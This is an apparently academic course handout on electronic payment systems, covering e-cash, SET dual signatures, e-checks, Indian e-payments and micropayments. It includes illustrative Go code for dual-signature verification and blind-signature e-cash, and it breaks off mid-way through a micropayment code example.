web technology and commerce unit 4

Post on 06-May-2015


UNIT IV

PREPARED BY ARUN PRATAP SINGH

WEB TECHNOLOGY AND COMMERCE (MCSE 201)


INTERNET PAYMENT SYSTEM

Internet payment systems are the various methods by which individuals and companies doing business online collect money from their customers in exchange for the goods and services they provide. A number of different forms of payment exist for online purchases, and more are being developed all the time. After all, it is in the best interest of both consumers and merchants to make electronic commerce as safe and easy as possible. The low cost of entry has attracted hundreds of companies, large and small, to the level playing field of cyberspace. Paul J. Dowling Jr. noted in his book Web Advertising and Marketing: "On the Internet, a small one-man operation can look as good or better than a large multinational corporation. But whether it's an individual working out of a virtual office or a CEO sitting in an expensive downtown office building, they're going online for one purpose: to sell. And they're leaving no stone unturned in their efforts to make it safe and easy for their customers to buy."

Customers who physically visit retail establishments can choose among a variety of payment methods, including cash, checks, credit cards and debit cards. Customers who shop on the Internet are beginning to expect online merchants to offer the same variety and convenience in payment terms. Credit cards remain the most common form of payment for online purchases, although the options have expanded to include digital cash, smart cards, electronic checks and other technologies. In addition, some customers continue to make online purchases using traditional payment methods, such as placing orders by telephone or fax or sending a check via "snail mail". Dowling recommends that companies conducting sales online make as many payment methods available as possible and advertise their acceptance of those methods on their Web sites. He claims that small businesses can add value to their product or service offerings by making payment easy, comfortable and secure for their customers. "Getting paid on the Web ultimately testifies to your marketing plan's effectiveness," Dowling wrote. "And when everything goes as it should, customers will place the order."

Perhaps the biggest issue affecting online payment systems, from both the seller's and the buyer's perspective, is maintaining the security of financial information sent over the Internet. A survey conducted by Visa showed that 91 percent of consumers were concerned about privacy and security on the Internet. Another study, conducted by the Boston Consulting Group and quoted in Computerworld, indicated that 28 percent of consumers' online purchase attempts failed, meaning that they intended to buy online but did not complete the transaction. "Concerns about security and the perception that online credit card transactions are extremely unsafe seem to be among the biggest issues keeping many retailers and consumers from closing sales electronically," Lorna Pappas wrote in Chain Store Age Executive.

An Internet payment system is also known as an electronic payment system.

What an electronic payment system is

An electronic payment is a financial exchange that takes place online between buyers and sellers. The content of this exchange is usually some form of digital financial instrument (such as encrypted credit card numbers, electronic cheques or digital cash) that is backed by a bank, by an intermediary, or by legal tender.

An electronic payment system is the system that lets a customer or user pay online for their shopping.


Requirements for e-payments

The factors that have led financial institutions to adopt electronic payments are:

1. Decreasing technology cost: the cost of the technology used in payment networks is falling day by day.

2. Reduced operational and processing cost: because technology costs are lower, the processing cost of commerce activities becomes very small. The simplest reason is that electronic transactions save both paper and time.

3. Increasing online commerce.

Some examples of EPS:

Online reservation

Online bill payment

Online order placing (e.g. Nirula's)

Online ticket booking (movies)

Major Internet payment methods

Secure Electronic Transaction (SET) protocol, for implementing credit card payment

An electronic check system, for supporting check payment

Electronic funds transfer and electronic cash systems, for emulating physical cash payment

Other methods

• Micropayment methods and smart card methods

Two storage methods

On-line

The individual does not personally hold the electronic cash; a trusted third party (e.g. an online bank) holds the customers' cash accounts.

Off-line

The customer holds the cash on a smart card or in a software wallet.

Because the issuer is not consulted at the moment of payment, preventing fraud and double spending depends on tamper-resistant hardware and cryptographic protection of the stored value; encryption alone cannot stop the holder from copying a token and spending it twice.


E-Cash

A system that allows a person to pay for goods or services by transmitting a number from one computer to another.

Like the serial numbers on real currency notes, the e-cash numbers are unique.

It is issued by a bank and represents a specified sum of real money.

It is anonymous. Whether a token can be passed on to a third party rather than deposited depends on the scheme, since a token that circulates must still be checked for double spending.

Electronic cash security

Cryptographic protocols prevent double spending: each token carries a unique serial number, and the issuer refuses to redeem a serial it has already seen.

Anonymity is preserved unless double spending is attempted.

Serial numbers can allow tracing to prevent money laundering.

E-Cash processing


E-Wallet

The E-wallet is another payment scheme that operates like a carrier of e-cash and other

information

The aim is to give shoppers a single simple and secure way of carrying currency

electronically

Trust is the basis of the e-wallet as a form of electronic payment

Procedure for using an e-wallet

1 Decide on an online site where you would like to shop

2 Download a wallet from the merchantrsquos website

3 Fill out personal information such as your credit card number name address and phone

number and where merchandise should be shipped

4 When you are ready to buy click on the wallet button the buying process is fully

executed


Smart Cards

A smart card is any pocket-sized card with embedded integrated circuits which can

process data

This implies that it can receive input which is processed and delivered as an output

Smart card Processing


Smart card applications:

Ticketless travel

Seoul bus system: 4 million cards, 1 billion transactions since 1996

Planned for the SF Bay Area system

Authentication / ID

Medical records

E-cash

Store loyalty programs

Personal profiles

Government

Licenses

Mall parking

Credit cards

A credit card is a plastic card carrying a card number, expiry date and security code, encoded on a magnetic stripe or chip.

It comes with a fixed credit limit that the holder can spend.

The customer has to repay the amount spent after some time.


Processing a credit card payment:

Risks in using credit cards:

Operational risk

Credit risk

Legal risk

Secure Electronic Transaction (SET) protocol

Jointly designed by MasterCard and Visa, with backing from Microsoft, Netscape, IBM, GTE, SAIC and others.

Designed to provide security for card payments as they travel on the Internet.

In contrast to the Secure Sockets Layer (SSL) protocol, SET validates consumers and merchants in addition to providing secure transmission.

SET specification

Uses public key cryptography and digital certificates for validating both consumers and merchants.

Provides privacy, data integrity, user and merchant authentication, and consumer non-repudiation.

The SET Protocol

What is a payment gateway?

A payment gateway is an e-commerce application service provider service that authorizes payments for e-businesses, online shopping, etc.

A payment gateway protects card details by encrypting sensitive information such as card numbers, so that the information passes securely between the customer and the merchant, and between the merchant and the payment processor.

How It works

Payments In India

Going the e-way

e-PAYMENT SYSTEM IN INDIA

• Ever-increasing technology changes

• Growing Internet access and mobile subscriber base

• Rising consumer confidence

• Convenient delivery/payment models

• India has been one of the fastest growing countries for payment cards in the Asia-Pacific region

• India currently has approximately 130 million cards (both debit and credit) in circulation

GROWTH IN e-PAYMENT SYSTEM

REGULATION

The Reserve Bank of India (RBI) has been supportive of the development of electronic payments.

In this direction, the "Payment and Settlement Systems Act" was enacted.

Apart from being supportive, the RBI has also initiated various programs to encourage e-payments.

CHANNELS OF PAYMENT

Indian banks have put in place various channels of electronic payment to encourage customers to adopt the electronic mode.

Channels such as the Internet, mobile, ATMs and drop boxes are among the most frequently used, apart from bank branches.

MARKET MAPPING

The e-payments processing market has two major players, namely Tech Process and Bill Desk, a pure-play electronic transaction processing company.

The Indian payment system is transforming from paper mode to electronic mode. Two main reasons for this shift are:

1. The regulator has mandated routing all high-value transactions electronically, to minimize the movement of money and the associated risk.

2. At the retail end, customers are realizing the efficiency of electronic payments.

SHIFTS IN THE PAYMENT SYSTEM

TECHNOLOGICAL ADVANCEMENT IN e-PAYMENT

• Electronic Clearing Service (credit and debit)

• National Electronic Funds Transfer (NEFT)

THE RULING PLASTIC MONEY

Credit cards

Debit cards

ATM cards

PayPal is a global e-commerce business allowing payments and money transfers to be made through the Internet. Online money transfers serve as electronic alternatives to paying with traditional paper methods such as checks and money orders. It is subject to the US economic sanctions list and other rules and interventions required by US laws or government. PayPal is an acquirer, performing payment processing for online vendors, auction sites and other commercial users, for which it charges a fee. It may also charge a fee for receiving money, proportional to the amount received. The fees depend on the currency used, the payment option used, the country of the sender, the country of the recipient, the amount sent and the recipient's account type. In addition, eBay purchases made by credit card through PayPal may incur extra fees if the buyer and seller use different currencies. On October 3, 2002, PayPal became a wholly owned subsidiary of eBay. Its corporate headquarters are in San Jose, California, United States, at eBay's North First Street satellite office campus. The company also has significant operations in Omaha, Scottsdale, Charlotte and Austin in the United States; Chennai in India; Dublin in Ireland; Kleinmachnow in Germany; and Tel Aviv in Israel. Since July 2007, PayPal has operated across the European Union as a Luxembourg-based bank.

Google Wallet

Google Wallet was launched in 2011, serving a similar function to PayPal: facilitating payments and transferring money online. It also features robust security and additional features such as the ability to send payments as attachments via email.

CHARACTERISTICS OF PAYMENT SYSTEM

There is no paper involved, so electronic payments can be effected directly from home or office.

Fast, efficient, safe, secure and generally less costly than paper-based alternatives, e.g. cheques.

Electronic payments are fully traceable.

In Ireland, the clearing time for standard electronic payments is next-day value for interbank transfers, subject to the payment instruction being received ahead of 'shut-off' times, which can vary from bank to bank. Payment instructions received after the 'shut-off' time will be processed one working day later.

Most banks offer same-day value for payments made to other accounts held in that same bank.

Many banks offer same-day interbank money transfer services for large-value payments.

Unlike cheques, electronic payments don't 'bounce', as payments will not be effected unless the funds are available in the first place.

Features of payment methods

• Anonymity: whether the payment method is anonymous

• Security: whether the payment method is secure

• Overhead cost: the overhead cost of processing a payment

• Transferability: whether a payment can be carried out without the involvement of a third party

• Divisibility: whether a payment can be divided into arbitrarily small payments whose sum is equal to the original payment

• Acceptability: whether the payment method is supported globally

4C PAYMENT METHODS

To make the e-commerce system functional, we also need to incorporate payment functions into the system.

In the physical world there are four types of payment methods:

• Cash

• Credit card

• Check

• Credit/debit (fund transfer)

A payment method should be:

– Very secure

– Low in overhead cost

– Transferable

– Acceptable anywhere

– Divisible

– Anonymous

Comparison of the 4C payment methods

SET PROTOCOL FOR CREDIT CARD PAYMENT

• The credit card is one of the most commonly used payment methods in e-commerce, in particular B2C e-commerce.

• Before the introduction of the SET protocol, secure credit card payment was usually carried out over an SSL connection.

Advantage of SSL

• It ensures the secure transmission of credit card information over the Internet.

Disadvantages of SSL

• It is not a complete credit card payment method: it only protects the channel between the browser and the merchant, so the merchant still receives the card number in clear.

• For example, it cannot by itself support on-line credit card authorization.

SET was developed specifically to provide secure credit card payment over the Internet.

It was backed by the major card schemes, including Visa and MasterCard. In practice, however, it was never widely deployed (cardholder certificates and wallet software proved too heavy for consumers), and card payments today still run over SSL/TLS, with card-scheme authentication protocols such as 3-D Secure layered on top.

• SET aims at satisfying the following security requirements in the context of credit card payment:

– Confidentiality: sensitive messages are encrypted so that they are kept confidential.

– Integrity: nearly all messages are digitally signed to ensure content integrity.

– Authentication: authentication is performed through a public key infrastructure.

SET network architecture

Merchant: a seller, which is connected to an acquirer.

Cardholder: a registered holder of the credit card, who is the buyer.

Issuer: the bank that issues the credit card to a cardholder.

Acquirer: the bank that serves as an "agent" linking a merchant to multiple issuers.

• A merchant can process various credit cards through a single acquirer.

• Payment gateway: this is typically connected to the acquirer.

– The payment gateway sits between the SET system and the financial network of the existing credit card system, for processing the credit card payment.

SET digital certificate system

Dual signature generation and verification

• In the physical credit card system:

– the payment instructions (PI), including the cardholder's credit card number and signature, are not kept confidential;

– data integrity can basically be ensured by using printed receipts;

– cardholder authentication relies on simple signature checking only.

• In an electronic credit card system:

– the order information (OI) and PI can be digitally signed to ensure data integrity;

– the sensitive credit card information may still be disclosed to other people.

• SET introduces a novel method called the dual signature (DS) to ensure data integrity while protecting the sensitive information: the merchant needs OI but not the card data, and the payment gateway needs PI but not the order details, yet both must be able to check that this OI and this PI belong to the same signed purchase.

How the merchant and the payment gateway verify the DS

• The merchant is provided with OI, H[PI] and DS.

• The dual signature can be verified as follows:

Step 1: The merchant first computes

H[ H[PI] || H[OI] ]

(the received hash of PI, concatenated with the hash of the OI it holds in clear).

Step 2: He then decrypts the digital signature with the cardholder's public signature key:

D_RSA[ DS | key_public_sign,cardholder ]

where key_public_sign,cardholder is the public signature key of the cardholder.

Step 3: Finally he compares the two terms H[ H[PI] || H[OI] ] and D_RSA[ DS | key_public_sign,cardholder ].

They should be the same if the transmitted DS (and the OI and H[PI] that travel with it) has not been changed; otherwise the order is not valid.

The payment gateway is provided with PI, H[OI] and DS, and performs the same three steps with the roles of PI and OI swapped: it hashes the PI it holds, uses the received H[OI], and compares the result with the decrypted DS.

By using the dual signature method, each cardholder can link OI and PI while releasing only the necessary information to the relevant party.

If either the OI or the PI is changed, the dual signature will no longer be valid.

("Decrypting" the signature with the public key is RSA-specific shorthand for signature verification: DS is the cardholder's signature over H[ H[PI] || H[OI] ].)

DIGITAL ENVELOPE

The payment instruction is encrypted with a fresh symmetric key, and that key is encrypted with the payment gateway's public key. The merchant forwards the resulting envelope but cannot open it; only the gateway can recover the key and hence the PI.


SET PROTOCOL

The SET protocol has four phases: initiation, purchase, authorization and capture.

First, the cardholder sends a purchase initiation request to the merchant to initialize the payment.

Then the merchant returns a response message to the cardholder.

In the second phase, the cardholder sends the purchase order together with the payment instruction to the merchant.

In the third phase, the merchant obtains authorization from the issuer via the payment gateway.

Finally, the merchant requests a transfer of the money to its account.
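The dual signature steps and the digital envelope described above, carried through in code as an added example; this is not code from the original notes or from the SET specification itself. It assumes RSA PKCS#1 v1.5 signatures over SHA-256 for the cardholder's signature key and RSA-OAEP plus AES-256-GCM for the envelope; SET's certificate handling, message formats and the authorization/capture phases are not modelled, and the OI and PI contents are constructed sample data (the PAN is the standard test number). The function names (DualSign, VerifyDS, Seal, Open, Purchase) are this example's own. It shows the merchant verifying with OI plus the received H[PI], the gateway opening the envelope and verifying with the recovered PI plus the received H[OI], and an OI with a changed amount failing the check.

```go
package main

import (
	"crypto"
	"crypto/aes"
	"crypto/cipher"
	"crypto/rand"
	"crypto/rsa"
	"crypto/sha256"
	"fmt"
)

func check(err error) {
	if err != nil {
		panic(err)
	}
}

// pomd is the payment-order message digest H[ H[PI] || H[OI] ] that the cardholder signs.
// Each verifier rebuilds it from the part it holds in clear plus the other part's hash.
func pomd(hpi, hoi []byte) []byte {
	buf := append(append(make([]byte, 0, 64), hpi...), hoi...)
	sum := sha256.Sum256(buf)
	return sum[:]
}

// DualSign produces DS = Sign_cardholder( H[ H[PI] || H[OI] ] ) (RSA PKCS#1 v1.5, SHA-256).
func DualSign(cardholder *rsa.PrivateKey, pi, oi []byte) []byte {
	hpi, hoi := sha256.Sum256(pi), sha256.Sum256(oi)
	ds, err := rsa.SignPKCS1v15(rand.Reader, cardholder, crypto.SHA256, pomd(hpi[:], hoi[:]))
	check(err)
	return ds
}

// VerifyDS is steps 1-3 of the text: recompute H[ H[PI] || H[OI] ] and check DS against it
// under the cardholder's public signature key. Only the two hashes are needed.
func VerifyDS(cardholder *rsa.PublicKey, hpi, hoi, ds []byte) bool {
	return rsa.VerifyPKCS1v15(cardholder, crypto.SHA256, pomd(hpi, hoi), ds) == nil
}

// Envelope is the digital envelope for PI: AES-256-GCM under a fresh key, with that key
// wrapped by RSA-OAEP to the payment gateway, so the merchant relays PI but cannot read it.
type Envelope struct{ WrappedKey, Nonce, Ciphertext []byte }

func aead(key []byte) cipher.AEAD {
	block, err := aes.NewCipher(key)
	check(err)
	gcm, err := cipher.NewGCM(block)
	check(err)
	return gcm
}

func Seal(gateway *rsa.PublicKey, pi []byte) *Envelope {
	buf := make([]byte, 32+12) // 256-bit key followed by a 96-bit GCM nonce
	_, err := rand.Read(buf)
	check(err)
	key, nonce := buf[:32], buf[32:]
	wrapped, err := rsa.EncryptOAEP(sha256.New(), rand.Reader, gateway, key, nil)
	check(err)
	return &Envelope{wrapped, nonce, aead(key).Seal(nil, nonce, pi, nil)}
}

// Open fails if the envelope was addressed to another key or the ciphertext was altered.
func Open(gateway *rsa.PrivateKey, env *Envelope) ([]byte, error) {
	key, err := rsa.DecryptOAEP(sha256.New(), rand.Reader, gateway, env.WrappedKey, nil)
	if err != nil {
		return nil, err
	}
	return aead(key).Open(nil, env.Nonce, env.Ciphertext, nil)
}

// Purchase runs one purchase request and reports the merchant's check, the gateway's check
// after opening the envelope, and whether an OI with an altered amount is rejected.
func Purchase() (merchantOK, gatewayOK, tamperRejected bool) {
	cardholder, err := rsa.GenerateKey(rand.Reader, 2048)
	check(err)
	gateway, err := rsa.GenerateKey(rand.Reader, 2048)
	check(err)
	// Constructed sample messages; the PAN is the standard test number, not a real card.
	oi := []byte(`{"order":"ORD-0001","item":"textbook","amount":"1250.00"}`)
	pi := []byte(`{"pan":"4111111111111111","exp":"12/29","amount":"1250.00"}`)
	ds := DualSign(cardholder, pi, oi)
	hpi, hoi := sha256.Sum256(pi), sha256.Sum256(oi)
	env := Seal(&gateway.PublicKey, pi)
	// Merchant: OI in clear (hashed locally), received H[PI], DS and the opaque envelope.
	merchantOK = VerifyDS(&cardholder.PublicKey, hpi[:], hoi[:], ds)
	// Gateway: opens the envelope, hashes the recovered PI itself, uses the received H[OI].
	piAtGateway, err := Open(gateway, env)
	check(err)
	g := sha256.Sum256(piAtGateway)
	gatewayOK = VerifyDS(&cardholder.PublicKey, g[:], hoi[:], ds)
	// A merchant who lowers the amount in OI can no longer match DS.
	t := sha256.Sum256([]byte(`{"order":"ORD-0001","item":"textbook","amount":"12.50"}`))
	tamperRejected = !VerifyDS(&cardholder.PublicKey, hpi[:], t[:], ds)
	return
}

func main() {
	fmt.Println(Purchase())
}
```

Run it with `go run` on the file; it prints `true true true`. The point to notice is that VerifyDS takes only hashes: the merchant never handles PI, the gateway never handles OI, and neither can swap in a different order or payment instruction without the comparison in step 3 failing.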

E-CASH

Electronic money is paperless cash. This money is either stored on a card itself or in an account associated with the card.

The most common examples are transit cards, meal plans and PayPal. E-cash can also mean any kind of electronic payment.

Electronic payment systems come in many forms, including virtual cheques, ATM cards, credit cards and stored-value cards. The usual security requirements for such systems are privacy, authenticity and non-repudiation.

There are four major components in an electronic cash system:

Issuers

Customers

Merchants or traders

Regulators

Issuers can be banks or non-bank institutions.

Customers are the users who spend e-cash.

Merchants and traders are vendors who receive e-cash.

Regulators are the related authorities or state tax agencies.

For an e-cash transaction to occur, we need to go through at least three stages:

Account setup: customers will need to obtain e-cash accounts through certain issuers. Merchants who would like to accept e-cash will also need to arrange accounts with the various e-cash issuers. Issuers typically handle accounting for customers and merchants.

Purchase: customers purchase certain goods or services and give the merchants tokens which represent the equivalent e-cash. Purchase information is usually encrypted when transmitted over the network.

Authentication: merchants will need to contact the e-cash issuer about the purchase and the amount of e-cash involved. The e-cash issuer will then authenticate the transaction and approve the amount of e-cash involved.

E-cash payment system

For accessing services online, e-cash is a prime method for secure online payments.

The following model shows how an e-cash payment system works.

This is a simple model of an e-cash payment system; it gives us an idea of how e-cash payment works. The model is explained in the following paragraphs.

The customer approaches his issuer's (bank's) site to access his account. The issuer in return issues the money in the form of tokens, generally in denominations of tens and hundreds, or as specified by the customer.

In the second phase, the customer endorses those tokens to the merchant to acquire services, and in doing so the customer authenticates the payment to the trader.

In the third phase, the trader approaches the token issuer (the customer's bank); after authenticating the tokens, the issuing bank converts them into electronic funds, which are transferred into the trader's account.

Finally, after receiving payment for the respective services, the trader provides the requisite service or product and also notifies the customer that the payment made into the trader's account has been approved.


E-cash security

Security is of extreme importance while handling online transactions. Faith in the security of the medium of exchange, whether paper or digital, is essential for the economy to function.

E-cash has a security advantage over card-based online payment: no long-lived credential such as a card number or password is handed to the trader, and the payment is in effect a fund transfer from the customer's account to the trader's. The flip side is that the tokens themselves are bearer instruments, so a stolen or copied token is as good as stolen cash until the issuer refuses it.

However, while accessing the customer's account, the customer must keep in mind the risk of interception or theft over the Internet. Hacking and cracking can be mitigated by using SSL/TLS website security, keeping the website link on a valid "https" URL, and running proper Internet security software to keep at bay the threats of malware, eavesdropping and other attacks.
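The three-stage model above (withdrawal of tokens from the issuer, spending at the merchant, online authentication and deposit at the issuer) together with the security properties listed earlier (unique serial numbers, double-spending detection, anonymity of the issued token), as an added example in Go; it is not part of the original notes. It assumes Chaum's RSA blind signature for issuing, a single fixed denomination, and an issuer that keeps an in-memory set of redeemed serials. Debiting the customer's account, the customer's login to the issuer and the transfer of funds to the trader's account are left out, and all names (Issuer, Coin, Withdraw, Deposit, SpendTwice) are this example's own.

```go
package main

import (
	"crypto/rand"
	"crypto/rsa"
	"crypto/sha256"
	"encoding/hex"
	"errors"
	"fmt"
	"math/big"
)

func check(err error) {
	if err != nil {
		panic(err)
	}
}

// Coin is the bearer token: a serial number plus the issuer's RSA signature on H(serial).
type Coin struct {
	Serial string   // chosen by the customer; the issuer never sees it at withdrawal
	Sig    *big.Int // issuer signature on H(Serial), unblinded by the customer
}

// Issuer signs coins of one fixed denomination and remembers every serial it has redeemed.
type Issuer struct {
	key   *rsa.PrivateKey
	spent map[string]bool
}

func NewIssuer() *Issuer {
	key, err := rsa.GenerateKey(rand.Reader, 2048)
	check(err)
	return &Issuer{key: key, spent: map[string]bool{}}
}

// SignBlinded is the withdrawal stage: the issuer debits the account (omitted here) and signs
// a value it cannot read, so it cannot later link the coin to the customer who withdrew it.
func (is *Issuer) SignBlinded(blinded *big.Int) *big.Int {
	return new(big.Int).Exp(blinded, is.key.D, is.key.N)
}

// Deposit is the authentication stage: the merchant presents the coin online and the issuer
// accepts it only if the signature is valid and the serial has never been redeemed before.
func (is *Issuer) Deposit(c Coin) error {
	if !Verify(&is.key.PublicKey, c) {
		return errors.New("invalid issuer signature")
	}
	if is.spent[c.Serial] {
		return errors.New("double spending: serial already redeemed")
	}
	is.spent[c.Serial] = true
	return nil
}

// digest hashes the serial first; signing a raw number would let anyone multiply two valid
// coins into a third, since textbook RSA is multiplicative.
func digest(serial string) *big.Int {
	h := sha256.Sum256([]byte(serial))
	return new(big.Int).SetBytes(h[:])
}

// Verify is what a merchant can do offline: Sig^e mod N must equal H(Serial).
func Verify(pub *rsa.PublicKey, c Coin) bool {
	e := big.NewInt(int64(pub.E))
	return new(big.Int).Exp(c.Sig, e, pub.N).Cmp(digest(c.Serial)) == 0
}

// Withdraw is the customer's side of Chaum's RSA blind signature.
func Withdraw(is *Issuer) Coin {
	n, e := is.key.N, big.NewInt(int64(is.key.E))
	raw := make([]byte, 16)
	_, err := rand.Read(raw)
	check(err)
	serial := hex.EncodeToString(raw)
	// Blinding factor r must be invertible mod N; retry in the (negligible) other case.
	var r, rInv *big.Int
	for rInv == nil {
		r, err = rand.Int(rand.Reader, n)
		check(err)
		rInv = new(big.Int).ModInverse(r, n)
	}
	blinded := new(big.Int).Mul(digest(serial), new(big.Int).Exp(r, e, n))
	blinded.Mod(blinded, n)
	// (m * r^e)^d * r^-1 = m^d * r * r^-1 = m^d mod N, the issuer's plain signature on m.
	sig := new(big.Int).Mul(is.SignBlinded(blinded), rInv)
	return Coin{Serial: serial, Sig: sig.Mod(sig, n)}
}

// SpendTwice withdraws one coin, has a merchant verify it, deposits it, then tries to deposit
// it again (as a second merchant would) and also tries a coin with a forged signature.
func SpendTwice() (accepted, firstDeposit, secondRejected, forgeRejected bool) {
	is := NewIssuer()
	coin := Withdraw(is)
	accepted = Verify(&is.key.PublicKey, coin)
	firstDeposit = is.Deposit(coin) == nil
	secondRejected = is.Deposit(coin) != nil
	forged := Coin{Serial: coin.Serial, Sig: new(big.Int).Add(coin.Sig, big.NewInt(1))}
	forgeRejected = !Verify(&is.key.PublicKey, forged)
	return
}

func main() {
	fmt.Println(SpendTwice())
}
```

Two things the model in the text leaves implicit are visible here: the issuer's protection against double spending is nothing more than the `spent` set consulted at deposit time, which is why the notes call this the on-line storage method; and anonymity comes from the blinding factor, not from the serial, because the issuer signed `m * r^e` and cannot recognise `H(serial)` when the coin returns.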

Advantages

We can transfer funds, purchase stocks and use a variety of other services without having to handle physical cash or cheques.

Electronic cash protects its user against theft of financial credentials: with electronic cash the customer does not need to provide financial information to the merchant.

E-cash supports small payments. Other online payment systems charge a fee for every transaction, no matter how large or small, whereas e-cash applies a threshold below which no additional charge is made, so very low-value payments are not charged a fee.

Limitations

However secure the e-cash payment system is, no one is safe against online fraud. In this case the fraud would be on the trader's side: the trader may take the amount but not provide the services.

While making the payment, it is very important that the Internet connection and power supply remain active. If a payment is in progress and the connection fails in between, it can lead to loss of information, i.e. the amount is charged but does not reach the trader, and a refund takes a long time, in general at least 30-45 days.

E-cash is not for everyone. Low-income segments without computer and Internet access are unable to make use of e-cash.

The rise of e-cash is inevitable, but further improvements are needed. Tackling security, anonymity, low-income-group readiness and technology reliability issues will make e-cash better. In countries such as India, where people were hesitant to use such methods, tremendous use of online payments and e-cash payment systems has been seen. Slowly but steadily the growth continues, and improving the technology will make it more reliable and efficient for customers to use.

E-CHECK

What is an electronic check?

It's simply an electronic version of a paper check. When you convert a traditional check into an electronic payment, you can process it through the Automated Clearing House (ACH) Network to save time and money, and because electronic checks have more security features than a paper check, they better protect your business and customers. Another way to think of an electronic check is when a customer pays by entering their bank account information online and electronically sending the money. Electronic checks are becoming increasingly popular because they are fast, efficient and secure. Electronic checks are sometimes called eChecks, electronic check conversions, or Back Office Conversions (BOCs). Read on for what you need to know as you consider using eChecks in your business.

eCheck, a payment instrument combining the security, speed and processing efficiencies of all-electronic transactions with the familiar and well-developed legal infrastructure and business processes associated with paper checks, was the first electronic payment mechanism chosen by the United States Treasury to make high-value payments over the public Internet.

How electronic checks work

The process is simple. First, you run a customer's paper check through an electronic scanner system supplied by your merchant service provider. This virtual terminal captures the customer's banking information and the payment amount. The information is then transferred electronically over the Federal Reserve Bank's ACH Network, which takes the funds from your customer's account and deposits them into yours. After payment approval, the virtual terminal prints a receipt for the customer to sign and keep. Your employee should then void the paper check and return it to the customer. You will be able to view and report on your merchant transactions online, although features may vary depending on your merchant service provider or your payment processing solution provider.

How does the ACH Network work with eChecks?

The ACH Network is a funds distribution system that moves funds electronically from one entity to another. It is a highly reliable and efficient nationwide electronic network governed by the rules of the National Automated Clearing House Association (NACHA) and the Federal Reserve (Fed). Given its ability to electronically transfer money directly to and from bank accounts, ACH is a faster payment method than traditional paper checks. The ACH payment process is close to the paper check process, only faster: clients give their bank routing and checking account numbers and, after verification, the payment is transferred almost immediately through the ACH system. Besides checks, the ACH Network also handles debit card transactions, direct deposits of payroll, Social Security and other government benefits, direct debit payments, and business-to-business payments.

Reaping the benefits of eChecks

Converting your customers' paper checks into electronic checks helps save time and reduces hassle for your staff, because you can submit payments electronically instead of making trips to the bank. However, time saving and hassle reduction are not the only benefits:

1. Reduce processing costs by up to 60 percent. eChecks require less manpower to process and don't come with any deposit or transaction fees. As a result, processing an eCheck is generally much cheaper than processing a paper check or credit card transaction.

2. Receive funds sooner. Businesses that use electronic check conversion have their funds deposited almost twice as fast as those using traditional check processing. Billing companies often receive payments within one day.

3. Increase sales. If your business doesn't accept paper checks, offering eChecks expands your customers' options and can increase sales. If you're converting from paper checks to eChecks, you can start accepting international and out-of-state checks while using account validation and customer authentication processes to protect your business from fraud.

4. Work smarter and greener. Electronic check conversion is easy to set up. It relies on the trusted ACH Network. And eChecks help reduce the more than 674 million gallons of fuel used and 36 million tons of greenhouse gas emissions created by transporting paper checks.

5. Decrease errors and fraud. eChecks reduce the potential for errors and fraud because fewer people handle them. Merchant service providers also maintain, monitor and check files against negative account databases that store information about individuals or companies with records of fraud.

Protecting your business and your customers

Electronic check conversion is one of the most secure payment methods in the electronic payment processing industry because it uses current information protection features:

1. Authentication. Merchants must verify that the person providing the checking account information has the authority to use that account. Authentication services and products available to merchants include digital signatures and public key cryptography. A digital signature is a value computed over the data with the signer's private key; it gives the receiver a reliable indication that the information was actually sent by the holder of that key and has not been altered since. (A digital certificate is a different object: it binds a public key to an identity, which is what tells the receiver whose key verified the signature.) Digital signatures are used on the Internet to confirm the identity of a customer much as a handwritten signature would. Because digital signatures are difficult to forge and easily transportable, they are a good way to verify identity. Digital signatures are often used to implement electronic signatures, which include any electronic data that carries the intent of a signature. Public key cryptography is a security method that uses a pair of keys. With electronic check conversion, the private key is the secret value used to create the digital signature on the eCheck, and the public key is the key given to anyone who needs to verify that the sender signed the eCheck and that the electronic transfer has not been tampered with.

2. Duplicate detection. Financial institutions use software and operational controls to prevent and detect duplication of the scanned electronic representations of customer checks.

3. Encryption. Messages to the ACH Network are encrypted in transit using 128-bit encryption over a Secure Sockets Layer (SSL, today TLS) connection.

How to get started with electronic checks

Here's how to implement electronic check conversion as quickly and easily as possible:

1. Choose a well-established processing company. Good pricing is important, but working with a reliable processor is essential.

2. Notify your customers that your business will begin using electronic check conversion. Federal laws require you to post a notification about this change and give your customers a take-away copy. You must also provide customers with a phone number to request more information.

3. Look for a processor that makes it easy to align your current business processes with your new electronic processing system, export customer data, and integrate your new system with your business management software.

4. QuickBooks Payments offers a complete payment processing solution. Businesses can take payments from their customers in many ways, from ACH bank payments and electronic checks to credit cards including Visa, MasterCard, Discover and American Express. In addition to offering many ways to get paid, QuickBooks Payments also enables businesses to email invoices to their customers with a "Pay Now" button. The vendor's data shows that businesses using QuickBooks Payments get paid twice as fast due to the e-invoicing feature.

This diagram illustrates how real-time electronic check processing works using the CyberSource Payment Service:

1. The payer (customer / bill payer) is prompted to authorize an electronic debit and enter the bank routing number (ABA) and account number.

2. The merchant's sales system securely transfers the order information to CyberSource over the Internet.

3. CyberSource forwards the bank routing number and account number to the processor.

4. The routing number and account number are validated and the integrity of the account's checking history is verified. The processor forwards approve/decline results to CyberSource.

5. CyberSource returns the approval/decline message to the merchant.

6. If approved, CyberSource routes the check for settlement through a processor to the Automated Clearing House (ACH) system. Funds are deposited in approximately 1-3 business days.

Four Different Scenarios of the FSTC E-check System –


MICROPAYMENT METHODS

Traditional payment methods are called macropayment methods. A new type of payment method, known as a micropayment method, is emerging to cater for very low value transactions. Examples: Millicent (pre-payment/credit based) and PayWord (post-payment).


MICRO PAYMENT IS -

Very small payments made over the Web

Transactions too small for credit cards

Can be as little as a fraction of a cent

Alternative to subscription and advertising

Can go in either direction

A micropayment is an e-commerce transaction involving a very small sum of money in exchange for something made available online, such as an application download, a service or Web-based content.

Micropayments are sometimes defined as anything less than 75 cents and can be as low as a fraction of a cent. A special type of system is required for such payments, which are too small to be feasible for processing through credit card companies.

Here's one scheme for micropayment. The user and seller each establish an account with a third-party service provider who monitors, collects and distributes micropayments. The seller encodes per-fee links inside a Web page. When the user initiates a transaction, payment goes through an Internet wallet account managed by the service provider. Micropayments accumulate until they are collected as single larger payments. Such a system is helpful when a user wants to make one-time micropayments to multiple sellers. Seller-based accounts are more common for repeat business with an individual enterprise.
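The third-party scheme described above, as an added example that is not from the notes or from any real provider: users prepay into an Internet wallet, every per-fee link hit moves a tiny amount to the seller's running total, and each seller is paid out in one larger settlement once a threshold is reached. All names and amounts are constructed.

```javascript
// Added example (not from the course notes): a third-party micropayment
// service of the kind the notes describe. Amounts are integers in tenths of a
// cent so that fractions of a cent never go through floating-point rounding.
// All names are hypothetical.
class MicropaymentService {
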